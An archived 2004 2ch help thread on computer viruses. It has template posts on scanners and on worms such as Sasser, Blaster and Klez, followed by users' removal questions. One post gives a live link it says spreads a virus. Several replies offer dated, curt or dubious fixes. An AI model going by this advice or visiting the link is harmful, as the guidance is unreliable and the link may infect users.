2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

コンピュータウィルス総合スレッド VOL.39

1 :■■ウィルス関連の質問・相談はこのスレッドでどうぞ■■:04/07/10 00:09 ID:lRQAjn97
※質問の前に、必ず >>1-13 かミラーサイト( http://pcqa.tripod.co.jp/virus.htm )を読んで下さい。
※E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
※2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
※他の場所から誘導された場合は、その旨書き添える事。(マルチポストとの区別)

★IPAセキュリティセンター http://www.ipa.go.jp/security/index.html
など、ウィルス情報を扱っているWebサイトを見て、ウィルスに関する理解を深めて下さい。

「ホームページが変なページ設定され元に戻らない」
「何もしていなくても、小さなウィンドウに変なページが表示される」
これらはウィルスではなくスパイウェアが原因の場合が多いです。
このPC初心者板の「エロサイト見てたら…助けてください」
というスレッドを検索して、そちらを読んでください。

>>2 オンラインスキャン・体験版
>>3 ウィルス定義ファイル・ワクチンメーカーリンク
>>4 最近よく見られるウィルス
>>5 ウィルスに感染しないために
>>6 Sasser に関する情報
>>7 Blaster & Welchia に関する情報
>8 Netsky / MyDoom に関する情報
>9 Klez に関する情報
>10 Badtrans.B に関する情報
>11 BugBear に関する情報
>12 Nimda に関する情報
>13 Madoka & Ozawa に関する情報
>14-15 過去ログ

前スレ コンピュータウィルス総合スレッド VOL.38
http://pc6.2ch.net/test/read.cgi/pcqa/1087156598/

2 :■■今すぐウィルススキャンを実行してみよう■■:04/07/10 00:10 ID:???
★ウィルス対策ソフトを導入していない人へ・・・
今すぐパソコンショップへ行って買ってきましょう!ウィルスバスター2002やNorton AntiVirusなら、
たいていのお店で売っているはずです。そして、今すぐ買うお金が無い人や、もう感染してるかもし
れないと思っている人はオンラインスキャンを実行してみましょう!でもオンラインスキャンは完璧
じゃないので製品版を買わなきゃダメですよ!買うお金が無いならプロバイダを解約して貯金!

・トレンドマイクロ/オンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
  オンラインでウィルススキャンが実行できます。ActiveXを利用しますので設定を確認してください。
  ※Internet Exprolerを使用してください

・シマンテック セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html

・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
  オンラインスキャンにしては珍しく、ウィルスの駆除も可能です。
  ただし滅茶苦茶時間が掛かります。※Internet Exprolerを使用してください

・ウイルスバスター評価版ダウンロード
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/trial.htm
  (2002体験版 http://www.trendmicro.co.jp/product/vb2002/lis.asp )

・シマンテック/Norton AntiVirus体験版ダウンロード
http://www.symantec.com/region/jp/trial/index.html

★ウィルス対策ソフトを導入してる人へ
ウィルス対策ソフトを導入していたとしても、時々はシステム全体をスキャンしてみましょう。
気が付かないうちに感染していることもあるかもしれません。定期的なウィルススキャンを心懸けましょう。
時間がかかるので、寝ている間にスキャンさせておくと朝には終わってると思います。

※もちろんウィルスの定義ファイル更新も忘れないでください。これが一番【重要】です!

3 :■■ウィルス定義データは定期的に更新しよう■■:04/07/10 00:10 ID:???
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2002、Inter Scan
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonAntiVirus for Mac
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/indexjpn.html
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・日本ネットワークアソシエイツ株式会社 http://www.nai.com/japan/
 製品名:McAfee VirusScan 、GroupShield
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
★McAfee VirusScanはWindowsシステムに悪影響を及ぼすことがあるため、使用しない方がいいです★

4 :■■最近よくみられるウィルスに関して■■:04/07/10 00:11 ID:???
 怪しい添付ファイルは絶対に実行(ダブルクリック)せずに、速やかに削除を。

★W32/Sasserに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/sasser.html
★W32/Netskyに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/netsky-b.html
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
★W32/Mydoomに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
★W32/Bagleに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/bagle.html
★W32/MSBlasterに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/msblaster.html
★W32/Welchiaに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/welchi.html
★W32/Bugbearに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/bugbear.html
★W32/Klezに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/klez.html
★W32/Badtransに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
 Outlookはメールを開いただけで、OutlookExpressではプレビューしただけでウィルスに感染します。
★W32/Hybrisに関する情報@IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/hybris.html
★Code Redに関する情報@Microsoft
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/codefaq.asp
 
※これら以外にも、大変多くのウィルスが存在しています。感染しないように注意すると共に、
 ウィルス監視ソフトなどで常にガードしておくことが重要です。

5 :■■ウィルスに感染しないために■■:04/07/10 00:11 ID:???
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

6 :W32.Sasser.Wormとその亜種にご注意!!:04/07/10 00:12 ID:???
このウイルスは、MS04-011 の悪用を試みるワームです。ランダムに選択された
IPアドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、
ウイルススキャンで検出できません。最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、
メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.asp
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

7 :コンピュータウィルス総合スレッド:04/07/10 00:13 ID:???
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

8 :コンピュータウィルス総合スレッド:04/07/10 00:13 ID:???
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

9 :「W32/Klez」に関する情報:04/07/10 00:13 ID:???
W32/Klezウイルスは、Internet Explorerの既知のセキュリティホールを悪用したウイルスで、
メールの添付ファイルを介して感染を拡げます。このウイルスが添付されたメールを受け取ると、
Outlookではメールを開いただけで、OutlookExpressではプレビューしただけで感染します。
また、亜種も多く発見されています。IPAへは2002年4月〜8月の5ヶ月連続で1000件以上の届け出がありました。
●予防策
 ★ブラウザ(InternetExplorer)にパッチを適用する。
  InternetExplorer 5.01の場合、SP2 を適用する。
  InternetExplorer 5.5 の場合、SP2 を適用する。
  InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
  ※但し、5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
●説明
 このウイルスに感染すると、Outlookのアドレス帳に登録されている全てのアドレス宛に
 ウイルスを添付したメールを送信します。送信者のアドレス欄には、ウイルスが作成した架空のアドレスが、
 Klezウイルスの亜種の場合はウイルスが収集したメールアドレスの中から1つ選んで記載されます。
●駆除と修復
 このウイルスに感染してしまった場合は、レジストリ等の修正が必要となります。
 修復用ツールがワクチンベンダーから配布されているので、自己責任で使うと良いでしょう。
●関連リンク
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.a@mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e@mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h%40mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.E
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

10 :「BADTRANS.B」に関する情報:04/07/10 00:14 ID:???
2001年末より「BADTRANS.B」が猛威を奮っています。
このウィルスはInternet Explorerのセキュリティホールを悪用しており、
Outlookでメールを開いたりOutlook Expressでメールをプレビューさせた
だけで自動的に実行され、感染します。

●予防策
 ★ブラウザ(Internet Explorer)にパッチを適用する。
  InternetExplorer 5.01の場合、SP2を適用する。
  InternetExplorer 5.5の場合、SP2を適用する。
  Internet Explorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
  ※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨

●説明
 このウィルスに感染すると、受信トレイの未読メールに返信する形で自分自身を添付してメールを
 送信したり、Temporary Internet Filesなどにある.asp、.htm、.htmlファイルなどからメールアドレス
 を取得して自身を添付してメールを送信します。ウィルス自身に送信機能があるため、メーラーの
 送信履歴などには残りません。また同時にキーボード操作を記録するプログラムを投入して、
 ウィルス作者にパスワード等の操作記録を送信しようとします。

●駆除と修復
 感染してしまった場合、最新のウィルス定義ファイルでスキャンして検出されたファイルを削除し、
 レジストリ等を修正する必要があります。駆除ツールを使う場合は自己責任で利用してください。

●関連サイト
 http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
 http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM%5FBADTRANS%2EB
 http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
 駆除ツール
 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3368

11 :「BugBear」に関する情報:04/07/10 00:14 ID:???
Bugbear(W32/BugBear-A, W32/BugBear@mm, Tanatos)ワームが猛威を振るっています。このウ
イルスは
トロイの木馬型で、自分自身のコピーをメールに添付して拡大します。感染すると受信トレイ・送信ト
レイ・その他のファイルからメールアドレスを収集し、取得できた全てのアドレスに対してウイルスを
送信します。さらに共有されているネットワークプリンタに対してもウイルスを送信するため、環境に
よってはウイルスの活動のたびに不可解な文字列の羅列が印刷される症状が現れます。

●予防策
 ★ブラウザ(InternetExplorer)にパッチを適用する
  InternetExplorer 5.01の場合、SP2 を適用する。
  InternetExplorer 5.5 の場合、SP2 を適用する。
  InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
  ※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨
 ★外部からの137と138ポートの通信をファイアウォールで遮断し、
  ネットワーク内部のNetBios 名前解決(ブラウジング)の異常増加を監視する

●下記サイトにも情報が掲載されているので、参照して下さい。
 W32/Bugbear
 http://www.ipa.go.jp/security/topics/newvirus/bugbear.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.bugbear@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BUGBEAR.A
 修復ツール
 http://www.symantec.com/region/jp/sarcj/data/w/w32.bugbear@mm.removal.tool.html
 http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4939
 http://www.nai.com/japan/virusinfo/stinger.asp

●備考
感染するとバックドアが用意され、感染パソコンのキーボード入力履歴が作られます。そのため悪意の
あるウイルス作者?に侵入されたりパスワードを盗まれたりします。感染してしまった場合は駆除した
あとにパスワード類を全て変更してください。

12 :「W32/Nimda」とその亜種に関する情報:04/07/10 00:15 ID:???
このウイルスは、セキュリティホールを悪用したウイルスで、ホームページを見るだけでウイルスに
感染することがあります。亜種も出現しているので、出現後にウイルス監視ソフトの定義ファイルを
更新していない場合、ウイルススキャンで検出出来ません。最新の定義ファイルに更新しましょう。

●予防策
 ★ブラウザ(InternetExplorer)にパッチを適用する
  InternetExplorer 5.01の場合、SP2 を適用する。
  InternetExplorer 5.5 の場合、SP2 を適用する。
  InternetExplorer 6.0 をインストールする(必ずOutlook Expressを含む標準構成以上で行なう)。
  ※但し、IE5.01はサポートが打ち切られているのでIE5.5SP2以上を推奨

●下記サイトにも情報が掲載されているので、参照して下さい。
 W32/Nimda
 http://www.ipa.go.jp/security/topics/newvirus/nimda.html
 http://www.trendmicro.co.jp/nimda/
 駆除ツール
 http://www.trendmicro.co.jp/nimda/tool.asp (リンク切れ)

●備考
 W32/Nimdaは1年以上前から流行していますが、いまだにウイルス届け出のトップ10にランクインして
 います。それだけ感染力が強いウイルスだということですので警戒を怠らないようにしましょう。
 ※ちなみに2002年10月はKlez/Bugbear/Nimda/Badtrans/Hybrisがトップ5です。

13 :『MADOKA』・『OZAWA』について:04/07/10 00:15 ID:???
これはトロイの木馬と呼ばれるバックドア型ハッキングツールと診断されていましたが、
実際にはトロイ活動は無いジョークだということになっています。2ちゃんねる内で
直接リンクされることが多く、かなりの感染者が出ています。

<<感染ルート>>
 madoka.zipなどをダウンロードし、解凍・実行することで感染します。

<<感染するとどうなるのか>>
 ・突然、女性の顔写真が画面いっぱいに表示されます。
 ・システム起動時にこのプログラムが実行されるようシステムを改変します。

<<詳細情報>>
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

<<駆除方法>>
1.PC起動時に「F8」キーを連打してセーフモードで起動
2.「スタート」-「検索」-「ファイルやフォルダ」でmadoka.exe、madoka.log、
 ozawa.exe、ozawa.logを検索し削除
 (madoka.log、ozawa.logは無いかもしれないので無ければ気にしない)
3.Windows98の場合はC:\Windows\win.iniを開き、run=ozawa.exeと書かれて
 いるところの ozawa.exe の部分を消去し上書き保存
 (Windows2000の場合はC:\WINNT\win.iniだと思われるが未確認。
  win.iniに上記のrun=ozawa.exeが記入されてるかは不明)
4.PCを通常起動で駆除終了

14 :■■過去ログ■■:04/07/10 00:15 ID:???
過去ログは情報の宝庫です
VOL 1 http://natto.2ch.net/pcqa/kako/987/987063100.html
VOL 2 http://natto.2ch.net/pcqa/kako/992/992241089.html
VOL 3 http://natto.2ch.net/pcqa/kako/997/997485641.html
VOL 4 http://natto.2ch.net/pcqa/kako/1000/10008/1000881294.html
VOL 5 http://natto.2ch.net/pcqa/kako/1001/10012/1001242103.html
VOL 6 http://pc.2ch.net/pcqa/kako/1005/10057/1005771153.html
VOL 7 http://pc.2ch.net/pcqa/kako/1006/10068/1006818033.html
VOL 8 http://pc.2ch.net/pcqa/kako/1007/10071/1007142533.html
VOL 9 http://pc.2ch.net/pcqa/kako/1007/10076/1007658885.html
VOL10 http://pc.2ch.net/pcqa/kako/1008/10088/1008862704.html
VOL11 http://pc.2ch.net/pcqa/kako/1010/10105/1010511938.html
VOL12 http://pc.2ch.net/pcqa/kako/1011/10119/1011948828.html
VOL13 http://pc.2ch.net/pcqa/kako/1012/10129/1012945529.html
VOL14 http://pc.2ch.net/pcqa/kako/1014/10144/1014418017.html
VOL15 http://pc.2ch.net/pcqa/kako/1015/10157/1015798305.html
VOL16 http://pc.2ch.net/pcqa/kako/1017/10177/1017727636.html
VOL17 http://pc.2ch.net/pcqa/kako/1019/10192/1019273687.html
VOL18 http://pc.2ch.net/pcqa/kako/1020/10205/1020583752.html
VOL19 http://pc.2ch.net/pcqa/kako/1021/10219/1021932401.html
VOL20 http://pc.2ch.net/pcqa/kako/1023/10235/1023569198.html

15 :■■過去ログ■■:04/07/10 00:16 ID:???
過去ログは情報の宝庫です
VOL21 http://pc.2ch.net/pcqa/kako/1025/10254/1025452031.html
VOL22 http://pc.2ch.net/pcqa/kako/1026/10269/1026931400.html
VOL23 http://pc.2ch.net/pcqa/kako/1029/10291/1029180331.html
VOL24 http://pc.2ch.net/pcqa/kako/1032/10321/1032120386.html
VOL25 http://pc.2ch.net/pcqa/kako/1035/10352/1035251402.html
VOL26 http://pc.2ch.net/pcqa/kako/1037/10370/1037042803.html
VOL27 http://pc5.2ch.net/pcqa/kako/1042/10420/1042090267.html
VOL28 http://pc5.2ch.net/pcqa/kako/1046/10462/1046237849.html
VOL29 http://pc5.2ch.net/pcqa/kako/1053/10537/1053751626.html
VOL30 http://pc5.2ch.net/pcqa/kako/1060/10607/1060770728.html
VOL31 http://pc5.2ch.net/pcqa/kako/1061/10615/1061572290.html
VOL32 http://pc5.2ch.net/pcqa/kako/1063/10633/1063324373.html
VOL33 http://pc2.2ch.net/test/read.cgi/pcqa/1067837089/
VOL34 http://pc5.2ch.net/test/read.cgi/pcqa/1076474510/
VOL35 http://pc5.2ch.net/test/read.cgi/pcqa/1081273348/
VOL36 http://pc5.2ch.net/test/read.cgi/pcqa/1083682988/
VOL37 http://pc6.2ch.net/test/read.cgi/pcqa/1085648175/

16 :ひよこ名無しさん:04/07/10 00:23 ID:???
>>1
きれいなテンプレ乙

17 :ひよこ名無しさん:04/07/10 01:14 ID:???
>>1
乙カレー
PCも風邪ひくことあるんだにゃ。
ウィルスは風邪で
スパイウェアは病気ということにしよーか。

なーんてな。



18 :ひよこ名無しさん:04/07/10 08:57 ID:???
>>17
「風邪」なんてレベルじゃないのもあるけどね。


19 :ひよこ名無しさん:04/07/10 14:44 ID:b6IH48S/
・Panda/無償オンラインスキャン
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm

に、アクセスしてウイルススキャンしようとしてもエラーページに飛ばされるんですが
どうしませうl。

20 :ひよこ名無しさん:04/07/10 14:50 ID:???
>>19
すでに感染していてhostsが書き換えられているのでは?

アダルトサイト被害対策の部屋より「hostsファイルの削除 (緊急処置)」
ttp://higaitaisaku.web.infoseek.co.jp/hosts.html

ここの「ダミーのhostsファイルを入れる」という場所を読んで、
実行してみてください。アクセスできるようになるかも知れませんよ。

21 :ひよこ名無しさん:04/07/10 15:20 ID:???
ここに誘導されたのできました。
Antinnyって、完全スキャン(ノートン)して
win.iniのぬるぽを消せばいいんですよね?

22 :ひよこ名無しさん:04/07/10 15:37 ID:???
              ,、-―-、   俺のデスクトップ!?
             丿   <`)       __
        ,、- ''' "二ヽ_(ヽ'`(二ニ・    |   \_
        /  、     !__'、_┌´     │   / `' ー┐
     /     ヽ   |   `         |   |     |
   ___ |    ヾ__|   |   _,、r‐'',ニ=-  |  /  _,、-‐'゙
 _| '、|    ミ/ ゙、  |_,∠-''´ ̄`'ー、   ̄|-''" |
 \|.  |     l___l     / ̄ヾ`´`   | ̄ ̄ ̄`'''iー、
.  |/゙|    ̄   ヽ_,、-''´`ヽ _,、,、,、,、_|______|_
  |  ( ´         ,、- ''゙  丿 ヾ二二二二二二二二二|ニ!
  ヽ<二二二二二>~/ / /   └‐┬─‐────┬┘
      フ,||,     / / /      │        │

23 :ひよこ名無しさん:04/07/10 18:16 ID:???
2日前くらいから、製品のアップデートというポップアップが出てきます。
広告みたいなものじゃないです。
でも製品名が書いてないし、1時間に10回くらいは出るので怪しいと思い、
ウィルススキャンしたところBKDRというハッキングツールの一種が入ってました。
色々調べていたのですがいまいち駆除の仕方に辿りつけず、
もう一度スキャンしたらウィルスは感知されませんでした。
でも製品アップデートは出てくるし、急にサイトが見れなくなったりします。
最初は回線が悪いのかと思っていたのですが、2日間そんな状態が続いてるので。
一体これは何なのでしょうか?
スパイウェアなんですかね?

24 :ひよこ名無しさん:04/07/10 19:54 ID:???
>>23
バックドア型スパイウェアだな

25 :ひよこ名無しさん:04/07/10 21:19 ID:???
>>23
ここのテンプレ読んで実行

エロサイト見たら…助けてください!Part31
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/


26 :ひよこ名無しさん:04/07/10 21:45 ID:S1fb8Y3X
ウイルス↓
http://hyper10.amuser-net.ne.jp/~auto/b3/usr/azumi/brd1/bbs.cgi

これにひっかかってしまって困ってます
インターネット開いたら毎回BLANKで2.3回でてきます
それに英文でSPYWAREがどーのというのも別窓ででてきます
上記の・シマンテック セキュリティチェック ではTROJとでて「ファイルから隔離できませんでした」となり
Panda無償オンラインスキャン で駆除しようと思い実行しましたが「ウイルス見つかりません」と出ました

こんな私になにかアドバイスをおねがいします。

27 :ひよこ名無しさん:04/07/10 22:11 ID:5zJ3QYlc
TROJ_RAHITOR.Aと言うウイルスに感染したんだけどコレってヤバイの?
どうやって駆除するの

28 :ひよこ名無しさん:04/07/10 22:22 ID:???
>>27
マイクロトレンドとかのサイトに行って駆除の方法が載ってる

29 :ひよこ名無しさん:04/07/10 22:22 ID:???
TROJDECEIVLNK.Aというウイルスに感染したんですが、
バスターで駆除出来なくてファイルは削除しました。って表示が出ましたが
パソコンが相変わらず起動出来ません。
どうしたらいいのですか?

30 :ひよこ名無しさん:04/07/10 22:30 ID:???
>>29
セーフモードで起動、ウィルススキャンし、駆除する。

31 :ひよこ名無しさん:04/07/10 22:37 ID:???
>>30
サンキュー
もう一度ウイルスバスターを使うってことですね?

32 :26:04/07/10 22:40 ID:S1fb8Y3X
TROJ_AGENT.ACていうウイルスでした。どなたか・・・

33 :ひよこ名無しさん:04/07/10 22:40 ID:5zJ3QYlc
マイクロトレンドに行って見たのですが
いまいち良く解りませんここしかないのでしょうか?初心者ですみません

34 :29:04/07/10 22:46 ID:???
TROJDECEIVLNK.Aもマイクロトレンドで検索してもみつからなかったよ。

35 :ひよこ名無しさん:04/07/10 22:46 ID:???
ウイルスバスターを使う。

36 :ひよこ名無しさん:04/07/10 22:48 ID:???
>>29
リアルタイム検索してる?

37 :ひよこ名無しさん:04/07/10 22:54 ID:???
>>34
あるじゃねーか

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DECEIVLNK.A

38 :ひよこ名無しさん:04/07/10 23:17 ID:???
↑どんな被害が出るの?踏むのが怖い

39 :ひよこ名無しさん:04/07/10 23:19 ID:???
>>38
>>37のリンクを踏むのが怖いのか?
恐いのなら話にならんな

40 :ひよこ名無しさん:04/07/10 23:33 ID:1w39dWjA
Exploit-ByteVerifyというのに感染しました
駆除方法がみつかりません。教えてください。

41 :ひよこ名無しさん:04/07/10 23:36 ID:???
>>40
窓の手使え。

42 :ひよこ名無しさん:04/07/10 23:44 ID:1w39dWjA
>>41
すみません、もう少し詳しくおしえていただけませんか?


43 :ひよこ名無しさん:04/07/10 23:45 ID:???
>>42
でもなんで自演なんてするの?

44 :ひよこ名無しさん:04/07/10 23:47 ID:1w39dWjA
>>43
??自演なんてしてません。。。

いま検索して窓の手というのをインストールしてみたんですけれど
どうすればいいのかわかりません><
ウィルスはマカフィーで削除できませんでした、とでます。
助けてください。

45 :ひよこ名無しさん:04/07/10 23:48 ID:???
>>44
いじくるつくーる使え

46 :ひよこ名無しさん:04/07/11 01:41 ID:???
>>37
さんきゅー!自分では探せませんでした。
でも被害はこんなもんじゃないよ・・・・セーフティーモードでも立ち上がらない。

47 :名無しさん@そうだ選挙に行こう:04/07/11 10:04 ID:P+gVMLRz
BKDR_AGENT.AY

に、感染しました。駆除方法を教えていただけませんか?
よろしくお願いします。

48 :名無しさん@そうだ選挙に行こう:04/07/11 10:09 ID:???
初心者はお店でノートンを買う
え 間違ってないだろ 

>47

49 :47:04/07/11 10:19 ID:P+gVMLRz
>>48

返信、どうもです。
ノートン、インストしてます。最近、ウィルス付きのメールが来るようになり気になって
スキャンやてみたのですが、ウィルスは検索されず・・・。
他社のオンラインスキャンを試したところ、「BKDR_AGENT.AY」が検知されました。
ノートンでは、まだ対応してない新種?みたいで、依然ウィルス付きメールを隔離するだけ
になってます。
お力を貸していただけないでしょうか?

50 :名無しさん@そうだ選挙に行こう:04/07/11 10:26 ID:???
わるいが
プロが対応できんのに

わしら素人には手のおえんです 残念です


には

51 :名無しさん@そうだ選挙に行こう:04/07/11 10:40 ID:???
>>49
Backdoorならファイルの場所が分かれば手動で削除できないかい。

BKDR_AGENT.AY情報(トレンド)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_AGENT.AY
BackDoor-BDJ(McAfee)
ttp://www.mcafeesecurity.com/japan/security/virB.asp?v=BackDoor-BDJ

トレンドが対応しているようだから、
まずオンラインスキャンしてファイルの場所を特定してみてはいかがだろうか。

ウイルスバスターオンラインスキャン
ttp://www.trendmicro.co.jp/hcall/

その時に感染が見つかったらファイル名と場所をメモしておいて、
セーフモードで削除。出来るかは、わからないけど・・・。

52 :47:04/07/11 10:50 ID:P+gVMLRz
>>50-51

返信、どうもです。
早速、試してみようと思います。

53 :名無しさん@そうだ選挙に行こう:04/07/11 12:24 ID:2yEkJisn
>>47さんと同じBKDR_AGENT.AYが検出されました。
場所が特定できたのでそのまま削除しましたが、
再起動させるとまた同じところにできてます。
他に駆除方法はございますか?

54 :名無しさん@そうだ選挙に行こう:04/07/11 12:25 ID:???
>>53
窓の手使え。

55 :名無しさん@そうだ選挙に行こう:04/07/11 12:26 ID:???
>>47=>>53
自演すんなヴォケ

56 :53:04/07/11 12:29 ID:2yEkJisn
>>54
使い方がよくわかりません。
>>55
意味がよくわかりません。

57 :名無しさん@そうだ選挙に行こう:04/07/11 12:31 ID:???
>>56
